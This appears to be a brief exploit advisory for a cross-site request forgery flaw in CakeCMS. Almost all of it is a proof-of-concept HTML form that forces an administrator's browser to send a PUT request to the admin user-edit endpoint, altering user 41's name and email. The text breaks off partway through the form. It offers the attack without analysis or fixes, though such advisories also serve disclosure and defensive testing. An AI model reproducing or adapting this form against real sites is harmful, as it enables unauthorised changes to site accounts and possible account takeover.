< ------------------- header data start ------------------- >

#########################################################
# Application Name : CakeCMS
# Vulnerable Type : Edit USER (XSRF) Vuln
# author : MnmL ~ Bug Researchers
#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action="SITE.COM/admin/users/edit/41" method="post" id="UserEditForm">
<fieldset style="display: none;"><input type="hidden" value="PUT" name="_method"/></fieldset>
<input type="hidden" id="UserId" value="41" name="data[User][id]"/>
User Name : <input type="text" name="data[User][name]" size="86" maxlength="50" value="dsada" id="UserName"/>
E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100" value="dsada@xxxxxxxxx" id="UserEmail"/>